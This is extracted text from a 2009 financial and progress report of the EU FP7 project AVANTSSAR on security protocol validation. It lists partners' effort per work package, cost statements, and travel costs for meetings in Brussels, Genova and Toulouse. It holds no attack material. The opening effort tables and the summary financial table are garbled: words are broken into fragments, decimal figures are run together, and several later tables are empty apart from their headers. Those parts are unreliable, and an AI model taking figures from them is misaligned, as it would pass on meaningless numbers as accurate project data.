
00.0

00.0

05.0

00.0

00.0

00.0

00.0

02.0

00.0

00.0

00.7

00.0

028.7

50.7

0

Au

tom

ate

d r

easo

nin

g t

ech

niq

ues

WP

31

36

1

4.1

06.5

00.0

015.0

010.6

04.0

20.3

90.0

08.0

04.4

10.0

01.7

00.0

03.0

01.7

047.9

460.9

50.0

0153.8

0108.8

9

Satisfiabili

ty o

f A

SLan p

olic

ies

WP

3.1

130

1

0.0

00.0

00.0

04.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

01.5

00.0

010.0

817.6

60.0

045.8

227.7

4

Model checkin

g o

f A

SLan s

erv

ices…

WP

3.2

632

6

1.0

00.0

00.0

03.0

01.0

00.0

00.3

00.0

03.0

00.3

00.0

01.0

00.0

00.5

01.0

06.7

917.7

20.0

033.6

624.5

1

Att

acker

models

WP

3.3

110

110

3.1

06.5

00.0

03.0

09.6

04.0

20.0

90.0

04.0

04.1

10.0

00.7

00.0

00.5

00.7

027.9

414.9

10.0

035.6

642.8

5

Com

positio

nal re

asonin

g for

serv

ices …

WP

3.4

634

6

0.0

00.0

00.0

05.0

00.0

00.0

00.0

00.0

00.5

00.0

00.0

00.0

00.0

00.0

00.0

02.7

28.7

30.0

026.6

611.4

5

Abstr

action t

echniq

ues…

WP

3.5

934

9

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.5

00.0

00.0

00.0

00.0

00.5

00.0

00.4

11.9

30.0

012.0

02.3

4

Th

e A

VA

NT

SS

AR

Valid

ati

on

Pla

tfo

rmW

P 4

136

136

0.0

02.0

00.0

06.0

02.0

00.5

03.9

60.0

012.0

04.4

60.3

00.0

00.0

01.0

00.3

010.9

942.0

40.0

0109.0

053.0

3

The T

S O

rchestr

ato

rW

P 4

.16

30

6

0.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

07.1

98.6

00.0

034.7

515.7

9

The T

S V

alid

ato

rW

P 4

.26

30

6

0.0

02.0

00.0

04.0

02.0

00.5

02.0

00.0

06.0

02.5

00.0

00.0

00.0

00.5

00.0

03.5

015.3

60.0

052.5

018.8

6

Pla

tform

inte

gra

tion

WP

4.3

630

6

0.0

00.0

00.0

00.0

00.0

00.0

01.9

60.0

06.0

01.9

60.3

00.0

00.0

00.5

00.3

00.3

018.0

80.0

021.7

518.3

8

Pro

of

of

co

ncep

tW

P 5

136

136

1.5

01.1

00.0

08.0

02.4

011.5

09.1

80.0

030.0

017.6

88.4

014.8

00.0

028.0

022.2

045.8

941.9

00.0

0104.0

087.7

9

Definitio

n o

f th

e r

ele

vant

pro

ble

m c

ases

WP

5.1

16

16

1.0

00.0

00.0

01.0

01.0

06.0

00.0

00.0

06.0

06.0

07.5

00.0

00.0

07.5

07.5

027.8

40.5

50.0

019.5

028.3

9

Form

alis

ation o

f th

e p

roble

m c

ases

WP

5.2

330

3

0.5

00.3

00.0

03.0

00.8

05.5

04.1

80.0

013.0

09.6

80.9

09.8

00.0

015.5

010.7

016.0

525.8

40.0

046.5

041.8

9

Valid

ation o

f th

e p

roble

m c

ases

WP

5.3

936

9

0.0

00.6

00.0

03.0

00.6

00.0

02.0

00.0

04.0

02.0

00.0

04.0

00.0

03.0

04.0

02.0

09.8

50.0

023.0

011.8

5

Assessm

ent

WP

5.4

936

9

0.0

00.2

00.0

01.0

00.2

00.0

03.0

00.0

07.0

03.0

00.0

01.0

00.0

02.0

01.0

00.0

05.6

60.0

015.0

05.6

6

Dis

sem

inati

on

an

d in

du

str

y m

igra

tio

nW

P 6

136

136

0.6

01.0

00.0

04.0

01.6

09.2

910.9

30.0

036.0

020.2

20.8

00.9

00.0

012.0

01.7

018.8

122.4

30.0

0102.0

041.2

4

Dis

sem

ination

WP

6.1

136

1

0.0

01.0

00.0

03.0

01.0

01.2

91.0

00.0

04.0

02.2

90.5

00.6

00.0

07.0

01.1

04.7

511.4

80.0

037.0

016.2

3

Mig

ration t

o industr

ial develo

pm

ent

env

WP

6.2

136

1

0.6

00.0

00.0

01.0

00.6

08.0

07.9

30.0

032.0

015.9

30.0

00.3

00.0

00.0

00.3

013.7

68.9

50.0

057.0

022.7

1

Mig

ration t

o s

tandard

isation b

odie

sW

P 6

.325

36

4

0.0

00.0

00.0

00.0

00.0

00.0

02.0

00.0

00.0

02.0

00.3

00.0

00.0

05.0

00.3

00.3

02.0

00.0

08.0

02.3

0

8.0

013.0

00.0

043.0

020.8

031.5

226.7

60.0

0103.0

055.2

815.9

024.2

00.0

057.0

039.1

0167.8

4226.7

00.0

0590.0

0394.5

4

IEA

TS

AP

SIE

ME

NS

AV

AN

TS

SA

R

Pla

nn

ed

Date

Actu

al

Date

To

tal

To

tal

To

tal

To

tal



Table 8: Resources for Period P2: UNIVR

Estimated

Effort

Cumulative

Effort

Remaining

EffortWP Whole Project Start End Start End Period P1 Period P2 Period P3 Since start

Project Management WP 1 13.00 1 36 1 2.76 4.54 0.00 7.30 5.70

Project Coordination WP 1.1 5.00 1 36 1 0.94 2.12 0.00 3.06

Project Meetings WP 1.2 4.00 1 36 1 1.18 0.62 0.00 1.80

Project Administration WP 1.3 4.00 1 36 1 0.64 1.80 0.00 2.44

Modeling trust and security aspects… WP 2 15.00 1 30 1 1.85 9.42 0.00 11.27 3.73

Initial version of ASLan… WP 2.1 5.00 1 9 1 9 1.70 0.00 0.00 1.70

Extended version of ASLan… WP 2.2 5.00 10 18 10 18 0.15 8.72 0.00 8.87

Final version of ASLan… WP 2.3 5.00 19 30 19 0.00 0.70 0.00 0.70

Automated reasoning techniques WP 3 20.00 1 36 1 6.46 10.01 0.00 16.47 3.53

Satisfiability of ASLan policies WP 3.1 8.00 1 30 1 0.60 2.23 0.00 2.83

Model checking of ASLan services… WP 3.2 3.00 6 32 6 0.79 1.32 0.00 2.11

Attacker models WP 3.3 3.00 1 10 1 10 3.71 3.12 0.00 6.83

Compositional reasoning for services … WP 3.4 3.00 6 34 6 1.22 2.56 0.00 3.78

Abstraction techniques… WP 3.5 3.00 9 34 9 0.14 0.78 0.00 0.92

The AVANTSSAR Validation Platform WP 4 12.00 1 36 1 0.19 6.17 0.00 6.36 5.64

The TS Orchestrator WP 4.1 5.00 6 30 6 0.19 0.62 0.00 0.81

The TS Validator WP 4.2 7.00 6 30 6 0.00 2.43 0.00 2.43

Platform integration WP 4.3 0.00 6 30 6 0.00 3.12 0.00 3.12

Proof of concept WP 5 5.00 1 36 1 7.64 8.32 0.00 15.96 -10.96

Definition of the relevant problem cases WP 5.1 1.00 1 6 1 6 6.41 0.55 0.00 6.96

Formalisation of the problem cases WP 5.2 2.00 3 30 3 1.23 4.76 0.00 5.99

Validation of the problem cases WP 5.3 1.00 9 36 9 0.00 1.55 0.00 1.55

Assessment WP 5.4 1.00 9 36 9 0.00 1.46 0.00 1.46

Dissemination and industry migration WP 6 8.00 1 36 1 1.75 3.28 0.00 5.03 2.97

Dissemination WP 6.1 6.00 1 36 1 1.75 2.96 0.00 4.71

Migration to industrial development env WP 6.2 1.00 1 36 1 0.00 0.32 0.00 0.32

Migration to standardisation bodies WP 6.3 1.00 25 36 0.00 0.00 0.00 0.00

73.00 20.65 41.74 0.00 62.39 10.61

One person-month is 140 person-hours

PROGRESS OVERVIEW SHEET (Periods P1 and P2)

Beneficiary 1: UNIVR

Planned DateActual

DateActual Effort



Table 9: Resources for Period P2: ETH Zurich

Estimated

Effort

Cumulative

Effort

Remaining

Effort

WP Whole Project Start End Start End Period P1 Period P2 Period P3 Since start



















Proof of concept WP 5 7.00 1 36 1 3.70 4.70 0.00 8.40 -1.40




Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00





72.00 18.00 26.00 0.00 44.00 28.00



Beneficiary 2: ETH Zurich

Planned DateActual

DateActual Effort



Table 10: Resources for Period P2: INRIA

Estimated

Effort

Cumulative

Effort

Remaining

Effort




















Proof of concept WP 5 6.00 1 36 1 2.00 2.00 0.00 4.00 2.00




Assessment WP 5.4 0.00 9 36 9 0.00 0.00 0.00 0.00





59.00 21.00 19.87 0.00 40.87 18.13

One person-month is 133,92 person-hours


Beneficiary 3: INRIA

Planned DateActual

DateActual Effort



Table 11: Resources for Period P2: UPS-IRIT

Estimated

Effort

Cumulative

Effort

Remaining

Effort






Modeling trust and security aspects… WP 2 8.00 1 30 1 4.78 4.40 0.00 9.18 -1.18




Automated reasoning techniques WP 3 24.00 1 36 1 10.78 16.13 0.00 26.91 -2.91














Assessment WP 5.4 0.00 9 36 9 0.00 0.00 0.00 0.00





52.00 17.31 22.70 0.00 40.01 11.99



Beneficiary 4: UPS-IRIT

Planned DateActual

DateActual Effort



Table 12: Resources for Period P2: UGDIST

Estimated

Effort

Cumulative

Effort

Remaining

Effort
























Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00





60.00 16.50 38.00 0.00 54.50 5.50

One person-month is 141.3 person-hours


Beneficiary 5: UGDIST

Planned DateActual

DateActual Effort



Table 13: Resources for Period P2: IBM

Estimated

Effort

Cumulative

Effort

Remaining

Effort


Project Management WP 1 1.00 - - 1 0.30 0.65 0.00 0.95 0.05




Modeling trust and security aspects… WP 2 6.00 - - 1 3.95 2.12 0.00 6.07 -0.07




Automated reasoning techniques WP 3 14.00 - - 1 2.18 2.32 0.00 4.50 9.50






The AVANTSSAR Validation Platform WP 4 8.00 - - 1 0.00 3.36 0.00 3.36 4.64








Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00





40.00 11.46 11.93 0.00 23.39 16.61

One person-month is 146.66 person-hours


Beneficiary 6: IBM

Planned DateActual

DateActual Effort



Table 14: Resources for Period P2: OpenTrust

Estimated

Effort

Cumulative

Effort

Remaining

Effort
























Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00





31.00 7.50 2.00 0.00 9.50 21.50



Beneficiary 7: OpenTrust

Planned DateActual

DateActual Effort



Table 15: Resources for Period P2: IEAT

Estimated

Effort

Cumulative

Effort

Remaining

Effort
























Assessment WP 5.4 1.00 9 36 9 0.00 0.20 0.00 0.20





43.00 8.00 13.00 0.00 21.00 22.00



Beneficiary 8: IEAT

Planned DateActual

DateActual Effort



Table 16: Resources for Period P2: SAP

Estimated

Effort

Cumulative

Effort

Remaining

Effort
























Assessment WP 5.4 7.00 9 36 9 0.00 3.00 0.00 3.00





103.00 31.52 26.76 0.00 58.28 44.72



Beneficiary 9: SAP

Planned DateActual

DateActual Effort



Table 17: Resources for Period P2: SIEMENS

Estimated

Effort

Cumulative

Effort

Remaining

Effort
























Assessment WP 5.4 2.00 9 36 9 0.00 1.00 0.00 1.00




Migration to standardisation bodies WP 6.3 5.00 25 36 4 0.30 0.00 0.00 0.30

57.00 15.90 24.20 0.00 40.10 16.90



Beneficiary 10: SIEMENS

Planned DateActual

DateActual Effort



6.2 Explanation of personnel costs, subcontracting andany major direct costs

The tables Table 18 – Table 43 provide explanations of personnel costs, sub-contracting (none) and any major direct costs for each beneficiary; the firstset of these tables is taken from the FORMs C, while the second set providesmore details on the direct costs.

Note that no personal cost was charged by Nancy 2 University for theAVANTSSAR project progress in 2009. A personal cost of € 24,638 wascharged by the CNRS to UPS-IRIT for the AVANTSSAR project, corre-sponding to Philippe Balbiani’s participation.

Note also that the SIEMENS travel costs are already included in the indi-rect costs, and according to the 50/50 funding scheme for industrial partners,only half of the amounts quoted below are (indirectly) funded by the EU.



Table 18: Total costs for Period P2

FP7

- Gra

nt A

gree

men

t - A

nnex

VI -

Col

labo

rativ

e pr

ojec

t

120

10-0

4-18

22:

02

DR

AFT

Sum

mar

y Fi

nanc

ial r

epor

t - C

olla

bora

tive

proj

ect

Proj

ect a

cron

ymAV

ANTS

SAR

Proj

ect n

r21

6471

Rep

ortin

gpe

riod

from

01/0

1/20

09to

31/1

2/20

09Pa

ge1/

1

Fund

ing

sche

me

CP

Type

of a

ctiv

ityTo

tal

RTD

(A)

Dem

onst

ratio

n (B

)M

anag

emen

t (C

)O

ther

(D)

Tota

l (A+

B+C

+D)

Bene

f. nr

If 3r

dPa

rty,

linke

d to

bene

f.

Adju

stm

ent

(Yes

/No)

Org

anis

atio

nSh

ort N

ame

Tota

lM

ax E

CC

ontri

b.To

tal

Max

EC

Con

trib.

Tota

lM

ax E

CC

ontri

b.To

tal

Max

EC

Con

trib.

Tota

lM

ax E

CC

ontri

b.R

eq. E

CC

ontri

b.R

ecei

pts

Inte

rest

1N

oU

NIV

R155,766

116,824

00

32,728

32,728

00

188,494

149,552

149,552

00

1Ye

s (2

)U

NIV

R40

300

03,649

3,649

00

3,689

3,679

3,679

00

2N

oET

H Z

UR

ICH

195,068

146,301

00

00

00

195,068

146,301

146,301

0

3N

oIN

RIA

160,744

120,558

00

00

00

160,744

120,558

120,558

0

-999

3N

oU

NIV

ERSI

TE0

00

00

00

00

00

0

4N

oU

PS-IR

IT82,096

61,572

00

00

00

82,096

61,572

61,572

0

-998

4N

oC

NR

S34,760

26,070

00

2,816

2,816

1,844

1,844

39,420

30,730

30,730

0

5N

oU

GD

IST

158,408

118,806

00

00

00

158,408

118,806

118,806

0

6N

oIB

M R

ESEA

R136,989

68,494

00

7,515

7,515

00

144,504

76,009

76,009

0

7N

oO

PEN

TRU

ST39,386

29,539

00

00

00

39,386

29,539

29,539

0

8N

oIE

AT38,376

28,782

00

00

00

38,376

28,782

28,782

0

9N

oSA

P464,903

232,451

00

1,449

1,449

00

466,352

233,900

233,900

0

9Ye

s (1

)SA

P-15,805

-7,902

00

-34

-34

00

-15,839

-7,936

-7,936

0

10N

oSI

EMEN

S377,620

188,810

00

00

00

377,620

188,810

188,810

0

Tota

l1,828,351

1,130,335

00

48,123

48,123

1,844

1,844

1,878,318

1,180,302

1,180,302

0



Table 19: Costs for Period P2: UNIVR

FP7 - Grant Agreement - Annex VI - Collaborative project

2 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by each beneficiary)

Project Number 216471 Funding scheme Collaborative projectProject Acronym AVANTSSAR

Period from 01/01/2009 Is this an adjustment to a previous statement ? NoTo 31/12/2009

Legal Name UNIVERSITA DEGLI STUDI DI VERONA ParticipantIdentity Code 999838074

OrganisationShort Name UNIVR Beneficiary nr 1

Funding % for RTD activities (A) 75.0 If flat rate for indirect costs, specify % 60

1. Declaration of eligible costs/lump sum/flate-rate/scale of unit (in €)

Type of Activity

RTD (A) Demonstration (B) Management (C) Other (D) Total (A+B+C+D)

Personnel costs 87,492 0 16,680 0 104,172Subcontracting 0 0 0 0 0

Other direct costs 9,862 0 3,775 0 13,637Indirect costs 58,412 0 12,273 0 70,685

Total costs 155,766 0 32,728 0 188,494Maximum EU contribution 116,824 0 32,728 0 149,552Requested EU contribution 149,552

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties or did the projectgenerate any income which could be considered a receipt according to Art.II. 17 of the grant agreement ? No

If yes, please mention the amount (in €)

3. Declaration of interest yielded by the pre-financing (to be completed only by the coordinator)

Did the pre-financing you received generate any interest according to Art.II.19 ? NoIf yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art.II.14.1 ? NoIs there a certificate on the methodology provided by an independent auditor and accepted by the Commissionaccording to Art.II.4.4 ? No

Name of the auditor Cost of the certificate (in €),if charged under this project

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financialstatement according to Art.II.4.4 ? No

Name of the auditor Cost of the certificate (in €)

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition ofeligble costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grantagreement;- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only incomegenerated by the project which could be considered as receipts according to Art.II.17 of the grant agreement;- the interest declared above is the only interest yielded by the pre-financing which falls whithin the definition of Art.II.19 of the grant agreement;- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commissionand in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp Name of the Person(s) Authorised to sign this Fianancial Statement

Prof. Carlo Combi

Date & signature



Table 20: Costs for Period P2: UNIVR adjustment


3 2010-04-18 22:02

DRAFT



Period from 01/01/2009 Is this an adjustment to a previous statement ? YesTo 31/12/2009 Adjustment relates to Period : 2

Legal Name UNIVERSITA DEGLI STUDI DI VERONA ParticipantIdentity Code 999838074

OrganisationShort Name UNIVR Beneficiary nr 1



Type of Activity


Personnel costs 0 0 0 0 0Subcontracting 0 0 0 0 0

Other direct costs 25 0 3,657 0 3,682Indirect costs 15 0 -8 0 7

Total costs 40 0 3,649 0 3,689Maximum EU contribution 30 0 3,649 0 3,679Requested EU contribution 3,679




3. Declaration of interest yielded by the pre-financing (to be completed only by the coordinator)

Did the pre-financing you received generate any interest according to Art.II.19 ? NoIf yes, please mention the amount (in €)











Prof. Carlo Combi

Date & signature



Table 21: Costs for Period P2: UNIVR (details)

Personnel, subcontracting and other major direct cost items for beneficiary 1 (UNIVR) for the period P2Work Package Item description Amount Explanations

1, 2, 3, 4, 5, 6 Personnel costs 104,172 Salaries Subcontracting 0

1, 2, 3, 4, 5, 6 Equipment 1,691 1 laptop, 2 palmtops, server, hard disk1, 6 Website and project repository 287 Website, repository, presentation tools

1, 2, 3, 4, 5, 6 Travel 11,659Project & working meetings, project presentations and dissimination

Remaining direct costs 3,682 Adjustment (including interests refund)TOTAL DIRECT COSTS 121,491



Table 22: Costs for Period P2: ETH Zurich


4 2010-04-18 22:02

DRAFT




Legal Name Eidgenössische Technische Hochschule Zürich ParticipantIdentity Code 999979015

OrganisationShort Name ETH ZURICH Beneficiary nr 2



Type of Activity


Personnel costs 118,063 0 0 0 118,063Subcontracting 0 0 0 0 0

Other direct costs 3,855 0 0 0 3,855Indirect costs 73,150 0 0 0 73,150

Total costs 195,068 0 0 0 195,068Maximum EU contribution 146,301 0 0 0 146,301Requested EU contribution 146,301














Sabine Meens

Date & signature



Table 23: Costs for Period P2: ETH Zurich (details)

General Remaining direct costs 3,855.00 Travel and expenses for project meetings.

TOTAL DIRECT COSTS 121,918.00

1, 2, 3, 4 Personnel costs 118,063.00 One post-doc and one PhD student.

Subcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 2 (ETH Zurich) for the period P2

Work Package Item description Amount Explanations



Table 24: Costs for Period P2: INRIA


5 2010-04-18 22:02

DRAFT




Legal Name INSTITUT NATIONAL DE RECHERCHE ENINFORMATIQUE ET EN AUTOMATIQUE

ParticipantIdentity Code 999547074

OrganisationShort Name INRIA Beneficiary nr 3

Funding % for RTD activities (A) 75.0 If flat rate for indirect costs, specify % N/A


Type of Activity












Is there a certificate on the financial statements provided by an independent auditor attached to this financialstatement according to Art.II.4.4 ? Yes

Name of the auditor Agent Comptable INRIA Cost of the certificate (in €) 0





Karl TOMBRE

Date & signature



Table 25: Costs for Period P2: INRIA (details)

1, 2, 3, 4, 5, 6 Travel expenses 8,263.00 Participation to 3 project working meetingsTOTAL DIRECT COSTS 77,993.00

1, 2, 3, 4, 5, 6 Personnel costs 69,730.00 Salaries (Senior researcher and PhD Students)Subcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 3 (INRIA) for the period P2Work Package Item description Amount Explanations



Table 26: Costs for Period P2: University of Nancy


6 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by Third Party) Only applicable if special clause nr 10 is used



3rd partylegal Name UNIVERSITE DE NANCY 2

3rd partyOrganisationShort Name

UNIVERSITE NANCY II Working forbeneficiary nr 3



Type of Activity



Other direct costs 0 0 0 0 0Indirect costs 0 0 0 0 0

Total costs 0 0 0 0 0Maximum EU contribution 0 0 0 0 0Requested EU contribution














Francois Le Poultier

Date & signature



Table 27: Costs for Period P2: UPS-IRIT


7 2010-04-18 22:02

DRAFT




Legal Name UNIVERSITE PAUL SABATIER TOULOUSE III ParticipantIdentity Code 999851169

OrganisationShort Name UPS-IRIT Beneficiary nr 4



Type of Activity


















Gilles Fourtanier

Date & signature



Table 28: Costs for Period P2: UPS-IRIT (details)

2,3,4,5,6 Remaining direct costs 7,229 travel expenses and small equipmentsTOTAL DIRECT COSTS 51,309

2,3,4,5,6 Personnel costs 44,081 Cheikh, Chevalier, El Houri, Feuillade, and KourjiehSubcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 4 (UPS-IRIT) for the period P2Work Package Item description Amount Explanations



Table 29: Costs for Period P2: CNRS


8 2010-04-18 22:02

DRAFT

Form C - Financial Statement (to be filled in by Third Party) Only applicable if special clause nr 10 is used



3rd partylegal Name CENTRE NATIONAL DE LA RECHERCHE SCIENTIFIQUE

3rd partyOrganisationShort Name

CNRS Working forbeneficiary nr 4



Type of Activity


Personnel costs 21,725 0 1,760 1,153 24,638Subcontracting 0 0 0 0 0

Other direct costs 0 0 0 0 0Indirect costs 13,035 0 1,056 691 14,782

Total costs 34,760 0 2,816 1,844 39,420Maximum EU contribution 26,070 0 2,816 1,844 30,730Requested EU contribution 30,730














Mme Armelle Barelli

Date & signature



Table 30: Costs for Period P2: CNRS (details)


1,2,3,5,6 Personnel costs 24,638.00 Philippe Balbiani

Personnel, subcontracting and other major direct cost items for beneficiary 4 (CNRS) for the period P2Work Package Item description Amount Explanations



Table 31: Costs for Period P2: UGDIST


9 2010-04-18 22:02

DRAFT




Legal Name UNIVERSITA DEGLI STUDI DI GENOVA ParticipantIdentity Code 999976687

OrganisationShort Name UGDIST Beneficiary nr 5



Type of Activity


















Riccardo Minciardi, Renato Zaccaria

Date & signature



Table 32: Costs for Period P2: UGDIST (details)

1, 2, 3, 4, 5, 6 Remaining direct costs 14,426.00 Trips


1, 2, 3, 4, 5, 6 Personnel costs 84,579.00

Armando, Di Manzo, Giunchiglia, Carbone,

Ponta, Cappai

Subcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 5 (UGDIST) for the period P2




Table 33: Costs for Period P2: IBM


10 2010-04-18 22:02

DRAFT




Legal Name IBM RESEARCH GMBH ParticipantIdentity Code 999909854

OrganisationShort Name IBM RESEARCH GMBH Beneficiary nr 6



Type of Activity


Personnel costs 83,896 0 4,822 0 88,718Subcontracting 0 0 0 0 0

Other direct costs 6,236 0 0 0 6,236Indirect costs 46,857 0 2,693 0 49,550















Thomas Schlund

Date & signature



Table 34: Costs for Period P2: IBM (details)

1,2,3, 4,5,6 Travel 6,236.00

General meeting, meeting on WP3/4, as

well as conferences and workshops where

AVANTSSAR work was presented


1,2,3, 4,5,6 Personnel costs (Including Management) 88,718.00 Salary of 1 postdoc for the second project

Personnel, subcontracting and other major direct cost items for beneficiary 6 (IBM) for the period P2




Table 35: Costs for Period P2: OpenTrust


11 2010-04-18 22:02

DRAFT




Legal Name OPENTRUST ParticipantIdentity Code 999745245

OrganisationShort Name OPENTRUST Beneficiary nr 7



Type of Activity


















Ludwig Spiesser

Date & signature



Table 36: Costs for Period P2: OpenTrust (details)

3,2 Travel 3,836.00

Travel expenses : Aslan V2 meeting 1 (Genova),

Aslan V2 meeting 2 (Genova), Orchestration

work meeting with INRIA


1,2,3,4,5,6 Personnel costs 16,023.00

Subcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 7 (OpenTrust) for the period P2




Table 37: Costs for Period P2: IEAT


12 2010-04-18 22:02

DRAFT




Legal Name INSTITUTUL E-AUSTRIA TIMISOARA ParticipantIdentity Code 999624674

OrganisationShort Name IEAT Beneficiary nr 8



Type of Activity


















Dana Petcu

Date & signature



Table 38: Costs for Period P2: IEAT (details)

1, 2, 3, 4, 5, 6 Travel 1,185.00

participation to project meetings and

dissemination


1, 2, 3, 4, 5, 6 Personnel costs 22,800.00

1 senior faculty researcher, 1 postdoc, 1

doctoral student

Subcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 8 (IEAT) for the period P2




Table 39: Costs for Period P2: SAP


13 2010-04-18 22:02

DRAFT




Legal Name SAP AG ParticipantIdentity Code 999911212

OrganisationShort Name SAP Beneficiary nr 9



Type of Activity













Name of the auditor Deloitte&Touche GmbH Cost of the certificate (in €) 0





Peter Rasper

Date & signature



Table 40: Costs for Period P2: SAP adjustment


14 2010-04-18 22:02

DRAFT



Period from 01/01/2009 Is this an adjustment to a previous statement ? YesTo 31/12/2009 Adjustment relates to Period : 1

Legal Name SAP AG ParticipantIdentity Code 999911212

OrganisationShort Name SAP Beneficiary nr 9



Type of Activity



Other direct costs 167 0 0 0 167Indirect costs -15,972 0 -34 0 -16,006

Total costs -15,805 0 -34 0 -15,839Maximum EU contribution -7,902 0 -34 0 -7,936Requested EU contribution -7,936









Name of the auditor Deloitte&Touche GmbH Cost of the certificate (in €) 0





Peter Rasper

Date & signature



Table 41: Costs for Period P2: SAP (details)

1, 2, 3, 4, 5, 6 Travel 5,915.00All the travels listed in the proper section of the PPR (plus management)


1, 2, 3, 4, 5, 6 Personnel costs 169,615.00Salary of: 1,4 full-time Senior Researchers, and 1 PhD student until Nov 2009.

Subcontracting

Personnel, subcontracting and other major direct cost items for beneficiary 9 (SAP) for the period P2Work Package Item description Amount Explanations



Table 42: Costs for Period P2: SIEMENS


15 2010-04-18 22:02

DRAFT




Legal Name SIEMENS AG ParticipantIdentity Code 999987260

OrganisationShort Name SIEMENS Beneficiary nr 10



Type of Activity



Other direct costs 0 0 0 0 0Indirect costs 144,905 0 0 0 144,905















Dr. Milos Svoboda/Caroline Wagner-Winter

Date & signature



Table 43: Costs for Period P2: SIEMENS (details)


Personnel, subcontracting and other major direct cost items for beneficiary 10 (SIEMENS) for the period P2


1,2,3,5,6 Personnel costs 232,715.00 Labor costs (salaries + social charges)



6.3 General project meetings6.3.1 First AVANTSSAR Workshop and First Review Meeting

Brussels, Belgium.February 18–20, 2009.First AVANTSSAR Workshop and First Review Meeting, as planned in theDescription of Work.

Name of consortium participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 1033.66Mohammad Torabi Dashti (ETH Zurich) Zurich 672.70Michaël Rusinowitch (INRIA) Nancy 602.52Mathieu Turuani (INRIA) Nancy 595.12Yannick Chevalier (UPS-IRIT) Nancy 0.00Alessandro Armando (UGDIST) Genova 1273.59Marius Minea (IEAT) Timişoara 300.00Luca Compagna (SAP) Nice 721.09Stefan Seltzsam (SIEMENS) Munich 670.88



6.3.2 ASLan v.2 Meeting

Santa Margherita Ligure (Genova), Italy.April 21–22, 2009.Meeting organized to converge on the definition of the second version of thespecification language ASLan.

Participant: Departure place: Costs/€:Michele Barletta (UNIVR) Verona 265.71Silvio Ranise (UNIVR) Milano 151.83Luca Viganò (UNIVR) Verona 195.88Simone Frau (ETH Zurich) Zurich 408.10Mohamed Anis Mekki (INRIA) Nancy 1455.23Mathieu Turuani (INRIA) Nancy 1693.09Philippe Balbiani (UPS-IRIT) Toulouse 900.00Yannick Chevalier (UPS-IRIT) Nancy 0.00Alessandro Armando (UGDIST) Genova 1588.75(∗)

Roberto Carbone (UGDIST) Genova 140.90Serena Ponta (UGDIST) Genova 140.90Sebastian Mödersheim (IBM) Zurich 334.68Mohamed Mehdi Bouallagui (OpenTrust) Paris 1149,73Phouric Ung (OpenTrust) Paris 1149,73Marius Minea (IEAT) Timişoara 0.00(†)

Xavier Chantry (SAP) Nice 524.40Jorge Cuellar (SIEMENS) Munich 366.95David von Oheimb (SIEMENS) Munich 333.45Stefan Seltzsam (SIEMENS) Munich 333.95

(∗) This includes also one lunch and one dinner for all project participants.(†) For IEAT, the cost of part of the project meetings were covered from anational research grant supplementing FP7 participation.



6.3.3 2nd Synchronization Meeting

Genova, Italy.June 19–20, 2009.Regular meeting as planned in the Description of Work.

Participant: Departure place: Costs/€:Michele Barletta (UNIVR) Verona 295.10Silvio Ranise (UNIVR) Milano 229.70Luca Viganò (UNIVR) Verona 144.60Cas Cremers (ETH Zurich) Zurich 131.80Simone Frau (ETH Zurich) Zurich 295.80Mohammad Torabi Dashti (ETH Zurich) Zurich 599.10Mathieu Turuani (INRIA) Nancy 1455.99Yannick Chevalier (UPS-IRIT/INRIA ) Nancy 700.99Mounira Kourjieh (UPS-IRIT) Toulouse 754.37Alessandro Armando (UGDIST) Genova 800.01(∗)

Alessandro Cappai (UGDIST) Genova 0.00Roberto Carbone (UGDIST) Genova 0.00Serena Ponta (UGDIST) Genova 0.00Sebastian Mödersheim (IBM) Zurich 464.27Phouric Ung (OpenTrust) Paris 1380,03Marius Minea (IEAT) Timişoara 178.00Xavier Chantry (SAP) Nice 251.65Luca Compagna (SAP) Nice 411.45David von Oheimb (SIEMENS) Munich 386.48

(∗) This includes the cost of the meeting room, coffee breaks and dinner forall project participants.



6.3.4 WP4 Meeting

Toulouse, France.September 24–25, 2009.Synchronization on upcoming deliverables.

Participant: Departure place: Costs/€:Michele Barletta (UNIVR) Verona 724.38Simone Frau (ETH Zurich) Zurich 502.40Tigran Avanesov (INRIA) Nancy 0.00Mohamed Anis Mekki (INRIA) Nancy 0.00Michaël Rusinowitch (INRIA) Nancy 0.00Mathieu Turuani (INRIA) Nancy 0.00Philippe Balbiani (UPS-IRIT) Toulouse 411.45(∗)

Yannick Chevalier (UPS-IRIT) Toulouse 0.00Marwa El Houri (UPS-IRIT) Toulouse 0.00Roberto Carbone (UGDIST) Genova 430.80Serena Ponta (UGDIST) Genova 419.39Marius Minea (IEAT) Timişoara 0.00Gabriel Erzse (IEAT) Timişoara 457.00Wihem Arsac (SAP) Nice 416.62Jorge Cuellar (SIEMENS) Munich 822.23

(∗) This includes the cost of the lunchs, coffee breaks and one dinner for allproject participants.



6.4 Working meetings6.4.1 Definition and application of a distributed temporal logic

for the analysis of security protocols and services

